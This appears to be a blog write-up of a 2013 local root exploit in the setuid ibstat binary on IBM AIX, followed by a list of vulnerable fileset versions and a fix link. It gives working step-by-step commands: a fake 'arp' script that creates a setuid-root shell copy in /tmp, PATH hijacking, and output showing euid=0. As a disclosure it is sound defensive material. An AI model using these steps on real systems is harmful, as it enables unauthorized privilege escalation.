In July 2013 we saw a new vulnerabilite on AIX, it’s possible to allow local users to gain privileges with a very simple way.
The fail is due to a programming error in ibstat command
(futex@aixbox) $ which ibstat
/usr/bin/ibstat
(futex@aixbox) $ ls -l /usr/bin/ibstat
lrwxrwxrwx   1 root    bin             16 01 oct 02:18 /usr/bin/ibstat -> /usr/sbin/ibstat
(futex@aixbox) $ ls -l /usr/sbin/ibstat
-r-sr-xr-x   1 root    bin          47388 12 nov 2012 /usr/sbin/ibstat
After hunts, the real binary is /usr/sbin/ibstat, and is setuid bit!
With a simple string command, we can see which command the binary use
(futex@aixbox) $ strings /usr/sbin/ibstat | grep ifconfig
ifconfig %s
(futex@aixbox) $ strings /usr/sbin/ibstat | grep arp
arp -t ib -a
(futex@aixbox) $ strings /usr/sbin/ibstat | grep lsattr
lsattr -El %s
As we can see, all command are not call with her full path! So, we can exploit it easilly.
We place ourselves in the tmp directory
(futex@aixbox) $ cd /tmp
And we create a script with the name of one command use in ibstat binary, his goal is just copy the shell binary in /tmp and set setuit bit
(futex@aixbox) $ vi arp
#!/bin/sh
cp /bin/sh /tmp/root
chown root /tmp/root
chmod 4755 /tmp/root
Don’t forget to set executable bit on the script
(futex@aixbox) $ chmod 755 ./arp
After, we change the PATH environnement variable:
(futex@aixbox) $ PATH=.:${PATH}
(futex@aixbox) $ which arp
./arp
And launch ibstat command
(futex@aixbox) $ ibstat -a -i en0
ERROR: “/dev/en0”: open failed rc=2, errno=2
Check device state of “icm” and “en0”.
===============================================================================
IB INTERFACE ARP TABLE
===============================================================================
/tmp/arp script is launch by ibstat command, this command have root owner and setuid bit, so it execute witch root priviliges, and lauch our script witch root privilege too 🙂
(futex@aixbox) $ ls -l /tmp/root
-rwsr-xr-x   1 root    sys         292606 14 oct 10:48 /tmp/root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys)
(futex@aixbox) $ ./root
(futex@aixbox) $ id
uid=1001(futex) gid=3(sys) euid=0(root)
ibstat command is in devices.common.IBM.ib.rte fileset
The following fileset levels are vulnerable:
AIX Fileset Lower Level Upper Level
-------------------------------------------------------
devices.common.IBM.ib.rte 6.1.6.0 6.1.6.21
devices.common.IBM.ib.rte 6.1.7.0 6.1.7.18
devices.common.IBM.ib.rte 6.1.8.0 6.1.8.15
devices.common.IBM.ib.rte 7.1.0.0 7.1.0.21
devices.common.IBM.ib.rte 7.1.1.0 7.1.1.18
devices.common.IBM.ib.rte 7.1.2.0 7.1.2.15
You must upgrade your system, or install thie fix
ftp://aix.software.ibm.com/aix/efixes/security/infiniband_fix.tar
Rock it!